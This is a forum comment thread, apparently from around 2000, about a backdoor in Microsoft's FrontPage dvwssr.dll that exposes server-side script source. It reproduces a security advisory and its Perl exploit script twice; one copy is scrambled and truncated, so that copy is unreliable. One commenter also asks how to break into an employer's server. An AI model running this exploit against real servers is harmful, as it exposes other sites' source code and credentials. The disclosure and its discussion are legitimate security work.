My point was that somebody is going to get fired, loudly and publicly, over this. Almost certainly whoever put it into the code (you're right on that score), and very possibly his program manager. They're going to want to present the public with the idea that this was something that one guy slipped in rather than something that was mandated by policy -- which in fact I believe to be the case. They are then going to say, in effect, "It's OK now, he's gone, so this is never going to happen again" -- which in fact I don't believe for a minute.
You may be right about the Hotmail thing. I don't know. But you also have to remember that Hotmail is sort of this incidental little service off in the middle of nowhere where they don't even used Windows NT, fercryinoutloud. People do occasionally get fired for lesser crimes than this. (I almost did once, but that's another story for another time.) (They also get promoted for greater crimes than this, but that's yet another story for yet another time.)
--
Someone you trust is one of us.
After the communist Chinese version of Win98 came out, it was found that MS's Taiwan coders had planted a little surprise for their brethern across the Taiwan Straits....at certain times during the year a Taiwanese flag would appear on the desktop and "Screw the Communists" (or words to that effect) would scroll across the screen. I thought it was kind of cute but apparently neither MS nor the commies did.
This back door sounds more like a temporary measure that wasn't removed when it came time to ship, rather than some malicious thing perpetrated by a "rogue coder."
I just went and cleaned all our internal servers.
I'm not being really responsbile in verifying my facts, but this is what it looks like from initial survey.
The dvwssr.dll is indeed installed on machines which have Frontpage 98 *Application* installed. On machines that only had FP98 *server extensions*, I didn't find the file. If you upgraded to frontpage 2000 from 98, the file doesn't appear to be removed, so the bug stays. However, you should *never* ever install frontpage on a production server exposed to the internet. It's buggy and terribly insecure even without this one hole. The protocol is a mess. It's little better than basic authentication over non-SSL connection for eavesdroppers getting passwords.
"There's so much left to know/ and I'm on the road to find out." -Cat Stevens
Now that Microsoft is officially an illegal monopoly, and we now know that they intentionally put this back door in their software, it only reinforces that consumers actually are hurt by Microsoft's poor judgement.
If we can demonstrate harm done from this, I think that MS just might find themselves facing a huge class action lawsuit.
Slashdot (et al.) v. Microsoft, anyone?
There's nothing up on microsoft.com about it yet either, which also strikes me as strange. Is this really true? If so, it must be the security howler of the year.
The details were AFIAK posted to BUGTRAQ either today or yesterday, and there have been about 5 emails about it since. This vulnerability probably true.
So as far as I can gather, you basically don't have a clue.
"Yes, Mr SoAndSo,
No, I do not want your business and money, and please quit calling me."
You must not live in the real world to make such a stupid comment. Whether you like it or not, you have to live with Microcrap!!!
The fact that you now know the key to that encryption (which is not a one-way encryption like a linux passwd entry), _may_ allow you to decipher further backdoors into the server and others' websites...but in this case ONLY if you are already a user on that server, using Frontpage98 for your website, which will contain a copy of the dll file in question.
If anyone cares to decipher the code, it is on SecurityFocus.org...included in the listing of the original submission of the bug.
TheGeek
TheGeek
http://www.geekrights.org
Kill the monkey
I say bug, but it could be anything, from a hacker to a freak EM storm currupting the system. And who said anything about a Unix system? That's not the only OS used in mission critical systems, y'know...
- Damnit, I'm dead Jim
I couldn't agree more about remote backdoors being bad. HOwever...
I run a web server which is located at a site about 30 miles from my office. (for the record I don't drive). THe only system running on that webserver that allows remote access is ssh running on a non-standard port. If, for some reason, the ssh daemon dies, I'm fucked. I have to get out to the site ASAP and get it back up. I don't want to do that. If there is a backdoor/exploit in Apache that would allow me to get ssh running again, I'd be much happier using that....
- Damnit, I'm dead Jim
IMHO alot of designed backdoors are possibly left from debugging during development, kinda like cheat modes in games...
DO you really think that game developers want to spend hours getting to level 12 to check that the dragon you have to kill with the ion sword of famine coughs when you hit it 12 times with a haddock? Maybe some designed backdoors are there to allow developers to check features that would take a reletively long time to access using normal authentication procedures?
- Damnit, I'm dead Jim
There is no way in hell I'd reboot this server...
it takes about 10 minutes doing the memory check...
- Damnit, I'm dead Jim
ALso, wouldn't that be creating a backdoor?
- Damnit, I'm dead Jim
If ppl know about the backdoor, it's all the more reason to go and find it. However, if they don't publicize it, fewer people will search for it.
IMNSHO remote backdoors are usually (not always) bad, but backdoors that require physical access are more often than not useful in the event of a major systm failure...
When I was at school, all the sys admins went (both of them) on holiday at the same time, leaving me in control of the network (boy, did we play alot of Quake that week). But, Murphy struck, and the system died. Being the clever ppl the system admins were, they decided not to give me passwords to the server (I did, however, have keys to every room in the school... including the girls changing rooms, shame I didn't have a webcam) so when the server started going wrong (it decided to stop ppl logging in) I had to cause the Netware Monitor program to die (they had a passworded screensaver) so I could fix the problem. I used a backdoor to fix the problem. Then I got suspended for hacking. The bastards.
- Damnit, I'm dead Jim
Well, I can look at the source code for most (if not all) of the "Linux software" to see what it's doing... in the MS world, you have to go out of your way to track what the damned installer is blindly overwriting.
- What does it take to get people/organizations to produce quality work?
Simple: An economic imparative to do so.Business does what's best for business. I hate to sound like Katz but, this is "corpratism"... concepts like right and wrong, good and bad, and even legality are equated to dollars and decimal points. The only things that matter are stock valuations, revenues, and profits. I'm reminded of the "Splode" spoof-commercial from The Truth.
Take the automotive industry for an example; automakers forego a $6 safety device infavor of paying the legal fees in the "statistically infrequent" cases where it would have saved lives. By extention, your life is worth six US dollars.
[there are hundreds of examples like this.]
On a Microsoft OS _maybe_... try using IE on Solaris. You'll change your tune.
Oh don't get me wrong, they both suck. Netscape just sucks less.
Am I the only one that gets this? Freaking hilarious!!! This should be +5 funny, if you ask me.
python -c "x='python -c %sx=%s; print x%%(chr(34),repr(x),chr(34))%s'; print x%(chr(34),repr(x),chr(34))"
Since you clearly know nothing about defamation law I will **sigh** be forced to fill you in. The ***TRUTH*** is an affirmative defense to a defamation action. As a matter of law you are not entitled to an undeserved reputation. Just take a look at what the weenies did with BrowserBloat 6.
A backdoor could be hidden in the numbers, but everyone is so paranoid about that happening that the people who write the algorithms use well known numbers that seem random. For example, blowfish initializes the key generation part with the hex values of the decimal part of pi. While it's possible for them to use that in some way to have a back door, it's not like DES where the people that created them are the ones that might be trying to get at your data.
http://www.msnbc.com/news/394839.asp
When asked about the hidden insult Thursday, Jon Mittelhauser, one of Netscape's original engineers, called it "classic engineer rivalry."
heh.
And if the IIS administrator is stupid enough to allow FP extensions on the box in the first place! We're an IIS shop, and we absolutely do NOT allow FP on any of the IIS servers in the DMZ. These extensions have a history of security problems.
Besides, everyone knows that Visual Notepad beats the pants off of FrontPage.
right here. A good write up by rain forest puppy.
Jason
- CIA director William Casey was dying of brain cancer
- Congress subpoenaed his testimony in regard to the Iran-Contra affair
- Casey was scheduled for brain surgery before his appearance
- This surgery didn't slow the progress of his disease, but it did destroy his speech centers
- Congress got nothing from him during his appearance (a directly foreseeable result of the surgery)
I do not recall reading anything about the family asking for compensation; the man was dying anyway (he died very shortly afterwards), and I'm sure that payoffs are part of the spooks' usual and customary business practices.--
Time is Nature's way of keeping everything from happening at once... the bitch.
I agree, not only is it this 'security issue', but it is also childish name-calling.
I think the NetScape engineers should stand up against this, it makes sense to me.
I mean.., 'weenies', if it wasn't meant to be found.., they could've used a more 'insulting' insult surely hehe }:o)
Isn't it more likely that someone who hates Microsoft (um, narrows down the field quite a bit..) intentionally inserted this? Anybody want to check other dlls for backwards text with a dictionary checker?
>> a firing offense for the as yet unidentified employees.
I run a few NT IIS 4.0 servers with the 2000 extensions (never had the 98 extensions) and none of them even have this file. Is this only with the 98 extensions?
-witz
After doing some digging, it appears that this *only* affects IIS servers running the 98 extensions. The FP 2000 extensions have been out for more than a year. I'm not being apologist, but this certainly doesn't affect the scope of servers that Russ Cooper or several people here would lead you to believe.
/s
/s
H:\>dir \\dntweb01\c$\dvw*.*
Volume in drive \\dntweb01\c$ has no label.
Volume Serial Number is 24B8-C93E
File Not Found
H:\>dir \\dntweb01\d$\dvw*.*
Volume in drive \\dntweb01\d$ has no label.
Volume Serial Number is 6CB0-8E2D
File Not Found
IIS 4.0 server with FP2000 extensions.
"You can't be absolutely complacent, unless you both compile everything on your system from source and review all the source code before compiling."
.ppc.rpm and .deb packages...) and likely some people have looked it over. Whereas with Microsoft's source, you know for sure that nobody outside of Microsoft (and companies that have signed NDAs with Microsoft) has seen the source.
True. And even that doesn't help--unless, of course, you're absolutely perfect and there's no way a bug, backdoor, or easter egg could slip past you.
But you can feel much _more_ secure with open-source software than closed-source, even if you don't study the source, or even compile it yourself. Because you know that other people have compiled it (at the very least, whoever built the
When Microsoft releases something, they know people are going to hammer it and try to crash it, penetrate it, or otherwise make it fail. And their software is probably better than it would have otherwise been for this (scary thought, eh?). But they also know that nobody's going to recompile the source, much less study it. And their software is definitely worse than it could have been for this.
no
First, if you're fired for refusing to comply with an illegal order, you can sue for wrongful termination. And they know this, so you can just threaten it. Of course you'll want to start looking for a new job, but they're not going to fire you for that, or you can sue for retaliation.
For that matter, once you start looking for a new job, you have lots of options. Put the backdoor in as ordered and then tell everyone about it anonymously. Make the backdoor not work. Go way over schedule in implementing it.
And if you're working as a programmer at a major company, you're making enough money that you ought to be able to just quit and support your family for a few weeks while you look for a new job (and cool off your anger).
As for the one hour--well, if all you care about is money, sure, but if I just had to quit a job over something like that, I'd be looking a little more carefully at my next employer....
no
No, no, Win2005 won't be out until 2010. It'll be Win2002 that's released in 2005.
no
MacOS isn't a Microsoft OS, and IE 4.5 or 5.0 clobbers Netscape 4.x in every way--speed, stability, size, standards implementation, flexibility, and features. Plus, Steve Jobs told me to use it. (Actually, I use iCab 1.9 more often than either, as it's the only one that hasn't yet crashed my computer.)
The one area where Netscape beats IE is in platform support. IE runs on only Windows, MacOS, and a few Unixes, and it's wildly different on each platform. Netscape 4.7 runs pretty much the same under LinuxPPC as under MacOS, which is pretty nifty.
So what about Netscape 6.0? Well, it closes the gap in some areas, and goes even farther with its multiple platform support--plus, it's based on open source code. But for MacOS or Windows, IE is still better as an everyday browser. Sorry.
no
Is it me or is Microsoft getting worse at realising security flaws in their own software? :)
--
--
Andy
But yes, everyone should read WSC at least once: it's (IMHO) part of the canon.
--
Cheers
Cheers
Jon
Is this a backdoor or an easter egg? If it's a backdoor, how would someone take advantage of it? I work for a web developer that has one nt 4 box mixed againg the rest of the Unix boxes. If I can hack into the machine, they'll probably scrap it. Does anyone know how I can hack in?
Howdy.
Wait... the flight simulator WAS deliberate?!?!? I had thought it was a bug! Can't accidentally forgetting brackets in certain places turn a spreadsheet program into a flight simulator!? ;)
-----
"But really, I think life is just a game of Mao Nomic." -Purplebob
Couldn't it be possible that they just stripped out some inefficient code without looking at it when they decided to rewrite some subroutines?
>Backdoors aren't always a bad thing. Say due to some "bug" in the software, you get locked out of your mission critical system. How do you get back in?
Sendmail. Internet Worm.
Does ANYONE remember this? How the backdoor used was there to help debug sendmail. And how this known backdoor was used to propagate the worm.
If it was said on slashdot, it MUST be true!
I just don't get it.
With all of M$'s crappy software, the bugs, the stability problems, the BACKDOORS, I just can't for the life of me understand why people keep SPENDING GOOD MONEY for M$'s software!
It really is a damn shame that so much money is WASTED each year on CRAP LIKE THIS!
The part that really cracks me up is when someone makes a post like this and three-dozen pro-M$'ers respond back to it, praising M$!
I think the Government should form a task force to discover what M$ uses to brain-wash these poor unfortunates.
No matter where you go... there you are.
I dont know where I put the book,but in school one time I had to read a book about some I really disklike, so I read the biograpy of Bill Gates, and in there back when they where still based in NM, and shipping basic for the Trash 80, he said something to effect of, Screw beta testing, let the customer find the bug and then we will fix it. That is not the excate quote but then again I can find the book. Moveing sucks you loose everything.
Where are we going and why are we in a handbasket?
I just tried to get on microsofts site to read the latest from them about this issue and I was confronted with "internal server" error message.
Did someone get in the backdoor and wreak havoc?
I'm still working on a clever footer.
Yeah, but considering the amount of bloat present in all of MS's products, code review is probably an uphill struggle. There are always going to be small things which can get through, and I doubt this hole takes much code to implement.
It worked for me using a Swedish (don't ask) version of IE 5.0. Kinda makes you wonder how professional IE-developers really are huh? ;-) Or maybe they're... *creeps* human?
- Steeltoe Lizardman
http://www.debunkingskeptics.com/
Why don't they tell us what the login/password is? Do they still live in the Dark Middle-Ages?? Security through obscurity never worked and it never will!?!!
- Steeltoe "Slashbot powered by Slashdot"
http://www.debunkingskeptics.com/
But they didn't say almost every web site, they said web-hosting provider.
Don't most hosting companies offer *nix or NT options? If they only have 1 IIS site, they are "affected".
It's not the same. A security system isn't software and the tools to detect and use such a hole aren't (readily) available. OK, maybe in Wargames but not for most people in the real world.
Perhaps your ISP changed the search function, so it doesn't link to the original IE search page.
I'm using the list within a table cell. Wouldn't Opera automatically close the list at the </td> tag?
I believe most of the parsing errors are due to Slashdot's omission of a DOCTYPE declaration. Most of the errors seemed to be unwarranted. As for the true "errors"... Oftentimes, it is necessary to use non-compliant code in order to achieve a uniform look in both Netscape and IE. Also, HTML's limitations make it difficult to strictly adhere to the standards.
For instance, if you want to make unordered list items appear directly below some other text, you must omit the <UL> tags. There might be a better (i.e., standards-compliant) hack, but this is the way /. and I do it.
If one is dumb enough, he can install FrontPage extensions for apache. There exist local exploits in it (still, I think) though.
If you are actually interested:
l l
- I am not a so-called "security-expert", unless you want to call me that.
- I didn't remove services from customers, I refused to install frontpage extensions to apache, which provides trivial functionality (easily replaced with ftp) at a large cost of security (risk). See
http://www.dataguard.no/bugtraq/1998_2/0181.htm
http://www.dataguard.no/bugtraq/1998_2/0158.htm
...Or any of the other thousands of hits on an altavista search like "+frontpage +apache +exploit".
- It is impossible (or at best extremely difficult) for me to audit and secure these extensions myself because as far as I can tell, they are only distributed in binary form. Even if I did have the source, I wouldn't want to commit the time to it.
- I don't like very much of their software, but I never called MS engineers stupid. I like some of the research that comes out of MS, actually.
- Backdoor or not, security problems in MS Software are common (think SQL's 'sa', ActiveDirectory, BackOrifice, etc).
- My summer job may in fact be "janitor" to you (though most of the time I was doing development, I did some unix administration, too). But your implication that I'm stupid is not very nice or accurate, as I'm currently a CS student at a top-5 University. My "real job" is programming language research.
Your inflammatory tone betrays your own insecurity. Grow up!
Was this directed at me?
I definitely wasn't fired for refusing to install FP extensions on our apache web host, actually, my understanding of security is one of the reasons I got my job and one of the reasons I retain it.
I clearly recall seeing multiple exploits involving frontpage extensions on unix, and wouldn't doubt if these were planned (or not carefully-enough engineered around) by Microsoft.
On second thought, I think you are just a troll. Good evening!
Backdoors are *evil*, sick and wrong. No two ways about it.
Steff
First, with Free Software (or Open Source, depending on your views), there is the potential for review of the code. Whereas with closed source, you can only review the code if the company in question lets you. And most don't. With free software, chances are that if there's anything nasty in there, someone will find it. As for a security vulnerability in a binary package... If you're concerned about security, compiling from code is the way to go.
-RickHunter
Say due to some "bug" in the software, you get locked out of your mission critical system. How do you get back in?
If the software is so poorly written that it locks even the root user out, how can we believe that the backdoor is sufficiently hidden? The more reasonable solution is to write good code in the first place.
Gah
Dude, don't be an idiot. One Microsoft employee using FreeBSD does not constitute a conspiracy. Talk like that just makes Linux users in general look bad. You need to cool off.
# echo 'SboPshAeaM@rSicPocAheMt.SnePt' | sed -e 's/[SPAM]//g'
Oh well, you can fix it by hand...
(Sorry, couldn't resist...:)
It'll be interesting if M$'s "solution" to the problem is "buy the 2000 series software --- it doesn't have that bug!", neglecting to mention that some similar "feature" has been included to push people along the next time they haven't lined up at the trough to purchase whatever the newest M$ offering is.
not "bug" - screw up Its this sort of thing, as well as bugs, that gives microsoft it's reputation.
---
Just because life sucks, it doesnt mean you have to care.
If that were the case I would expect it to be removed althogether. It's not the sort of thing were people would say "O, we can't put that in, it's got bad language". However M$'s stupidity never ceases to amaze me.
---
Just because life sucks, it doesnt mean you have to care.
Depends upon your definition of "large group." The group of people working in their spare time is much larger than the overpaid group.
"The legitimate powers of government extend only to such acts as are injurious to others." Thomas Jefferson.
So doesn't this put you in the exact same position as the MS developers? That is, you're both taking a piece of crappy code written with little or no coherent design and trying to fix it after the fact?
"The legitimate powers of government extend only to such acts as are injurious to others." Thomas Jefferson.
I've seen a video web server box that allows a backdoor but that which is controllable by the admin of t he unit. It's rather clever, I thought. The admin can change the admin password, etc., it came with some simple default password. There's also a backdoor user called backdoor. You can't change the password on this one, it's known only to the company who made the box (supposedly). But you CAN change the backdoor user name. This is something that can be documented even. There's still security risks, but it's better than the simple backdoors, because there's a level of control over it, and they tell you there's a backdoor (if there's more, they didn't say).
Actually, this is a technique in software engineering. You seed a project with a known number of errors, and compare the number of known errors discovered in testing with the ones you put in in the first place. This gives you an idea of how thoroughly you have tested, and where you have gaps in your methodology.
Cool philosophy - next time I do an analysis, I'll be sure to include a couple of deliberate errors, just to make sure there are no accidental ones.
The really scary thing is, you're probably right, even though you meant it as a joke. You did mean it as a joke didn't you?
Salocin.com
Well duh, welcome to the party, took you long enough.
Salocin.com
Tell me, if telnetd (or however you get into Windows boxen normally) is down, why would backdoor.dll be up?? And why not let user set his own password for backdoor.dll? You didn't really think this out, did you? Neither did the moderators, I guess...
This sounds just like all those cheesy virus rumors that circle back every 9 months or so. Don't open the email that says "It takes guts to say Jesus". Rogue med students are stealing kidneys. And, oh yea, Microsoft left a backdoor password into its web server.
.dll that causes all MS instability and MS fired the man who new about it back in the 3.1 days. BTW, you can download the fixed file at ZDnet and TUCOWS, but Microsoft won't publish it.
Next I suppose I'll hear about a single
--- "1.21 Jigawatts!" -Doc
It's times like this that I'm glad as a web hosting provider that I run a wonderful open sourced operating system and web server. If this isn't enough to want to make a company switch to Linux, BSD, whatever - I don't know what is. This topic gave me a wonderful idea for a document that should be written. I have a feeling too many NT people stick with it because they're comfortable with it, it does the job although not perfectly, and they're afraid of how hard it might be to switch. I don't know if it exists, but if not there should be a howto, FAQ, or book written with the NT person in mind on migrating to Linux or BSD.
Hey wait a minute everyone...maybe this is just another M$ Easter Egg. When you hack this DLL does it show you some nifty little .avi with the Developer Credits?
Snipped from a bugtraq email...I thought it was a pretty nifty - #!/usr/bin/perl /file/to/retrieve/source /_vti_bin/_vti_aut/dvwssr.dll?".encodefilename($fi le)." HTTP/1.0\n\n";p qrstuvwxyz0123456789";
# dvwssr.pl by rain forest puppy (only tested on Linux, as usual)
#
# Usage: dvwssr.pl arget_host
#
use Socket;
$ip=$ARGV[0];
$file=$ARGV[1];
print "Encoding to: ".encodefilename($file)."\n";
$url="GET
print sendraw($url);
sub encodefilename {
my $from=shift;
my $slide="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmno
#
#
my $key="Netscape engineers are weenies!";
#
#
my $kc=length($from);
my ($fv,$kv,$tmp,$to,$lett);
@letts=split(//,$from);
foreach $lett (@letts){
$fv=index $slide, $lett;
$fv=index $slide, (substr $slide,62-$fv,1) if($fv>=0);
$kv=index $slide, substr $key, $kc, 1;
if($kv>=0 && $fv>=0){
$tmp= $kv - $fv;
if($tmp if(++$kc >= length($key)){ $kc=0;}
}return $to;}
sub sendraw {
my ($pstr)=@_;
my $target;
$target= inet_aton($ip) || die("inet_aton problems");
socket(S,2,1,getprotobyname('tcp')||0) || die("Socket problems\n");
if(connect(S,pack "SnA4x8",2,80,$target)){ select(S);
$|=1;
print $pstr;
my @in=;
select(STDOUT);
close(S);
return @in;
} else { die("Can't connect...\n"); }}
This isn't a flaw - it's deliberate. It's no more a flaw than the flight simulator in Excel 97
I did consider the word "flaw" carefully before using it. I don't consider it to be a "bug" or a "mistake". A flaw, however, can be there by design. Something like deliberately being a troll on Slashdot can be considered funny (deliberate) by some, but a character flaw by others.
for cheat code magazines etc.
.oO0Oo.
games developers put them in to give their games longevity and playground talkability
have u got the cheats for x game it's cool
gives kids some hope and they don't become to despondent
ask Carmack about god mode
There are places where the networks are not touching,and there are places where they are-Boeing's Lori Gunter
a sysadmin that argues FOR an undocumented and exploitable back door into his and *everybody* elses server that offers a total point of entry into everybody's files is clearly not the sysadmin you should be employing.
.oO0Oo.
Who the hell would rely on a server that is 30 miles from their only sysadmin who not only CAN'T DRIVE but says that 10 minutes of downtime is too much trouble.
There are places where the networks are not touching,and there are places where they are-Boeing's Lori Gunter
>... including the girls changing rooms, shame I didn't have a webcam
.oO0Oo.
ah, now I know why they didn't trust you
>Then I got suspended for hacking. The bastards
you of course went to your principle and said
"I can get in to the servers but only by hacking. Would you like me to proceed?"
no, you thought you knew better than the admins and took charge.
I hope they hit you with a clue stick
There are places where the networks are not touching,and there are places where they are-Boeing's Lori Gunter
I have avoided cheatcodes like the plague.
.oO0Oo.
they can make life fun sometimes
playing half life deathmatch with no dying is great fun with enough people - blood everywhere!!
There are places where the networks are not touching,and there are places where they are-Boeing's Lori Gunter
This can't be good for MS, but hey, maybe thats a good thing :)
really?
Phear my l33t homepage.
Well, hasn't Alan Cox been releasing on a regular basis a list of all the "issues" preventing them from releasing 2.4? I seem to recall there were about 40 or so things on that list. A few less than 65000 but hey who's counting :)
Phear my l33t homepage.
If Microsoft are saying that dvwssr.dll can be deleted, what does it actually do?
their marketing spin on **this** little darlin'. They have somehow convinced the ingorant-at-large that they are security concious enough to warrant using (you don't have to like it, but you can't argue that there aren't a lot of them out there..). Well, this one seems a bit too big of a turd for them to just wax over - anxiously awaiting further news....
mas cerveza, por favor politically incorrect stu
From the article above:
:-)
!This program cannot be run in DOS mode.
`.rdata
@.data
@.reloc
>%u:
D$4h
D$4j
]_^[
t*;5
D$4j
D$ DVWSSR.DLL
DllMain
GetExtensionVersion
HttpExtensionProc
!seineew era sreenigne epacsteN
HTTP/1.0 404 Object Not Found
XWebScope Source Retriever
_refresh_acls_
Content-type: text/html
KERNEL32.dll
lstrcmpiA
lstrcpynA
CloseHandle
ReadFile
CreateFileA
lstrlenA
lstrcpyA
GetModuleFileNameA
lstrcmpA
1!1-141H1O1
2q2}2
`0d0
dvwssr.dbg
ssr.dll
I/O Error G-17: Aborting Installation
Seems that back doors are the rage again. There was an article on internetnews.com about back doors in some shopping cart software that could allow a hacker complete control of the server it's installed on.
Anyone wanna go shopping?
if you don't like the system, change it.
Security Bugware
"Happiness in intelligent people is the rarest thing I know."
-- Ernest Hemingway
If you don't like what's being said, don't listen to it.
"Happiness in intelligent people is the rarest thing I know."
-- Ernest Hemingway
linux ~> uname -a /bin/su
/bin/su:
Linux linux 2.0.36 #3 Fri Dec 17 00:10:51 CST 1999 i686 unknown
linux ~> ident
$Id: su.c,v 1.9 1998/01/29 23:22:44 marekm Exp $
$Id: getdef.c,v 1.10 1998/04/02 21:51:42 marekm Exp $
$Id: port.c,v 1.3 1997/12/07 23:26:54 marekm Exp $
$Id: pwauth.c,v 1.6 1998/01/29 23:22:30 marekm Exp $
etc...
Does this mean /bin/su on that Linux machine (I think it's Redhat, but I don't actually know) has a backdoor? No.
How come Microsoft always takes decades to figure these security flaws? Is it intentional?
If you're not a Liberal in your 20's, then you have no heart.If you're still a Liberal in your 30's you have no brain.
erm... well... doesn't look like production code to me
--
Never underestimate the relief of true separation of Religion and State.
anyone think the password it "nutscrape" ? just a thought
Everybody denies I am a genius--but nobody ever called me one!
I'm not even really sure on the exact definition of hackers and crackers, but I know what cool people (us) say hackers are, which are like hard core coders and things like that. But cracker is supposed to mean like the kinda person that would exploit this "back-door." Why can't the mainstream say this right?
...the time I was looking through the file command.com (from Dos 6.22 if I can remember correctly). During my adventure I found some strings containing the names of some food (I think one of them said "apple pie" or something). Just the programmers having some fun I guess, though its not the most professional way to do things.
I wonder if there really is a back door or if Microsoft is trying to cover their ass from other companies possibly calling this slander or some such nonsense. Something like this could possibly give the government more ammunition to fire at MS in their ongoing legal battles, pressuring them to open up their code so that futher happenings would be prevented.
Actually, my NT domain server has taken to randomly locking out users. It doesn;t mark them as locked out, only tells them they are and prevents them from logging in. The fix is just to open their account in the user manager. It is particularly annoying to come in on a Monday and not be able to log into your own domain admin account. (But I AM the system admin, dammit!) Of course, we have a backup, so it's not a terribly big deal but it is annoying to me and my users. So it can happen. (By the way, if anybody knows how to fix this .... aside from a Samba server.... :)
Oh yes, if you can delete such a file you can also create a new one. Once there is a hook you can install a new backdoor anytime.
rain forest puppy just posted some of the technical details to bugtraq. See www.securityfocus.com.
The most depressing thing about this episode is not the back door/easter egg per se, but the lameness of the insult.
Here's the thing: if the best you can do is call Netscape engineers "weenies," then how ingenious can you really be in the conceiving and placing the back door itself?
!srehtaerb traf gnikcus elohssa
While I've never been truly impressed with the professionalism of MS employees, this takes the cake.
BlackNova Traders
...it's no longer a security system, but an easy access system for those in the know.
BlackNova Traders
...frontpage extensions for UNIX? It's a compiled binary, isn't it?
It does beg the question of whether or not something like this exists in those extensions as well... which, yes, would affect apache.
BlackNova Traders
afaik, you can get just any server script to be shown.. it's not related to asp!.. i think it will even display any file, it's like a hole in a file search system.. i know i tried with coldfusion scripts and it displays just the same. i guess it would work with perl files, php files, you name it.
/// evilloop.com
. . . that Linux is insecure because its Open Source and a "hacker" could put a security flaw in it, pull out this article and start to laugh.
Not a typewriter
Well, most *decent* software shops do anyway ;-)
Slashdot's token middle-aged housewife
----- UMBRA Advisory RFP2K02 -------------------------- rfp.labs --------- "Netscape engineers are weenies!" A back door in Microsoft FrontPage extensions ------------------------------------- Alf Serer / alf@at.clientlogic.com - rain forest puppy / rfp@wiretrip.net Table of contents: -1. The short -2. The long -3. The code -------------------------------------------------- ------------------------ "...we love a good conspiracy theory as much as the next person..." - secure@microsoft.com -------------------------------------------------- ------------------------ UMBRA UMBRA UMBRA UMBRA UMBRA UMBRA UMBRA UMBRA UMBRA UMBRA UMBRA UMBRA -------------------------------------------------- ------------------------ --[ 1. The short The NT 4 Option Pack ships with a particular ISAPI .dll in /_vti_bin/_vti_aut/ named dvwssr.dll, which is mixed in with the Microsoft FrontPage extensions (the version I have is 3.0.2.1105). This particular ..dll allows you to read .asp (and .asa) files under the web root, providing you know the 'password' (obfuscated encoding scheme) of which to ask it. And, as implied by the title, the constant key used in the encoding is "Netscape engineers are weenies!". I've been told that dvwssr.dll is a component of the NT 4 Option Pack, to be used with InterDev 1.0. Therefore deleting it will affect InterDev 1.0's 'View Links' function. Also, the default permissions don't allow for anonymous users to use the .dll--however, anyone with web authoring can, and I've seen few sites that have allowed permission (which is more due to a misconfiguration on their part). As Microsoft has told me, the immediate problem is moreso the fact that any developer of one particular virtual site can download the .asp code of other virtual sites on the same system. --[ 2. The long In the fairly recent light of Mr. Cuartango's finding of a backdoor in the authentication of Microsoft installation packages, Microsoft (secure@microsoft.com actually) stated to Bugtraq that the automatic acceptance of Microsoft packages is to "improve our customers' experience while downloading software from Microsoft web sites." Well, so let me relate how Microsoft has included an ISAPI .dll as part of the FrontPage extension package/Option Pack/Visual Interdev, to "improve a hacker's experience while downloading software from your web site". I was contacted by Alf Serer (alf@at.clientlogic.com), who indicated to me that dvwssr.dll looked like it was a backdoor, and that it contained the string 'Netscape engineers are weenies!'(although, it's found backwards in the .dll). Being the curious pup that I am, I decided to take a look. Using some prior research code attempts at cracking the encoding algorithm (herein referred to as the 'weenie algorithm'), I used a test ISAPI app Alf sent to figure out what the hell this thing was for, and what it is supposed to do. Searches on Microsoft's site said it was to 'verify URLs'. However, I could not find any references to it elsewhere, and even decompilation of the various FrontPage extension applications, FrontPage clients, and Interdev clients yeilded no calls or references to dvwssr.dll that I could see; however, I was later told that Interdev 1.0 requies this ..dll. Microsoft's site had dvwssr.dll down on the manifest for various FrontPage packages/installations. So, taking a peek at the .dll versions, I see that the other ISAPI .dlls that make up the core of FrontPage extensions are of version 3.0.2.1105, while dvwssr.dll is only 1.00.00.2503A. I would think that to mean it was recently introduced into the pack by Microsoft (if you don't know, FrontPage was an original program developed by Vemeer Technologies Inc; hence the _vti_ prefixes.) Granted, maybe it's possible that Vemeer engineers coded dvwssr.dll; but that means, upon acquisition, MS engineers left it in there. You would think some sort of Q&A and/or audit would catch it if it already existed... I'm not going to get into the exact details of the weenie encoding algorithm--after all, you have the code below. It's basically a 62 character slide-rule type of encoding. Luckily, from my auditing, this is not included with any other versions of FrontPage (including Unix), and in the versions I found it on, ACLs prevented its use (only System and Administrators were allowed full access); I was told by MS that only individuals with web authoring permission can use it, which is more than I had originally thought. But it's not as widespread as, say, RDS. ;) Regardless of it's actual purpose, or Microsoft's intent, I think the core interesting issue is that Microsoft literally coded (or allowed) a .dll who used a static key such as 'Netscape engineers are weenies!'. In any event, if you don't use Interdev 1.0, you can delete the file and call it a day. If you do use Interdev 1.0, well, it's your call, but I suggest an upgrade. --[ 3. The code #!/usr/bin/perl # dvwssr.pl by rain forest puppy (only tested on Linux, as usual) # # Usage: dvwssr.pl target_host /file/to/retrieve/source # use Socket; $ip=$ARGV[0]; $file=$ARGV[1]; print "Encoding to: ".encodefilename($file)."\n"; $url="GET /_vti_bin/_vti_aut/dvwssr.dll?".encodefilename($fi le)." HTTP/1.0\n\n"; print sendraw($url); sub encodefilename { my $from=shift; my $slide="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnop qrstuvwxyz0123456789"; # # my $key="Netscape engineers are weenies!"; # # my $kc=length($from); my ($fv,$kv,$tmp,$to,$lett); @letts=split(//,$from); foreach $lett (@letts){ $fv=index $slide, $lett; $fv=index $slide, (substr $slide,62-$fv,1) if($fv>=0); $kv=index $slide, substr $key, $kc, 1; if($kv>=0 && $fv>=0){ $tmp= $kv - $fv; if($tmp = length($key)){ $kc=0;} }return $to;} sub sendraw { my ($pstr)=@_; my $target; $target= inet_aton($ip) || die("inet_aton problems"); socket(S,2,1,getprotobyname('tcp')||0) || die("Socket problems\n"); if(connect(S,pack "SnA4x8",2,80,$target)){ select(S); $|=1; print $pstr; my @in=; select(STDOUT); close(S); return @in; } else { die("Can't connect...\n"); }} --[ 4. The End I know this is short and not with it's usual flare. I apologize...I have been running around like mad, and basically don't have the time or energy to expend into this. :/ - rain forest puppy Special thanks to Alf Serer, the founder of this bug; also, special thanks to attrition.org (especially McIntyre) for helping me wrangle this. I'm currently in the UK, so if you have immediate questions, I suggest you send an email to Alf or the Attrition staff (staff@attrition.org). Catch me, along with Fyodor, Ron Gula, Ken Williams, Theo DeRaadt, Mary Roesch, and others, at CanSecWest, May 10-12 in Vancouever, Canada. More info at www.dursec.com. ------------------------------------- Alf Serer / alf@at.clientlogic.com - rain forest puppy / rfp@wiretrip.net Regardless if Netscape engineers are weenies, Microsoft engineers are definately pompous ----- UMBRA Advisory RFP2K02 -------------------------- rfp.labs ---------
Cav Pilot's Reference Page
UNIX - Not just for Vestal Virgins anymore
